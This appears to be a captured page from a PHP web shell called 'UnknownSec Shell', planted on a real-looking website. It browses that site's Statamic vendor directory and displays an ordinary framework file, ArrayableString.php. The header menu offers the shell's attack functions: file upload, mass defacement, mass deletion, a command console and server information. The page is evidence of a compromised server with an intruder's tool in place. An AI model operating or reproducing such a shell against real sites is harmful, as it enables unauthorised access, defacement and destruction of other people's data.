shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Fields
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ArrayableString.php
<?php namespace Statamic\Fields; use Illuminate\Contracts\Support\Arrayable; use JsonSerializable; class ArrayableString implements Arrayable, JsonSerializable { protected $value; protected $extra; public function __construct($value, array $extra = []) { $this->value = $value; $this->extra = $extra; } public function value() { return $this->value; } public function extra() { return (array) $this->extra; } public function __toString() { return (string) $this->value ?? ''; } public function toArray() { return array_merge(['value' => $this->value], $this->extra); } #[\ReturnTypeWillChange] public function jsonSerialize() { return $this->toArray(); } }
© 2026 UnknownSec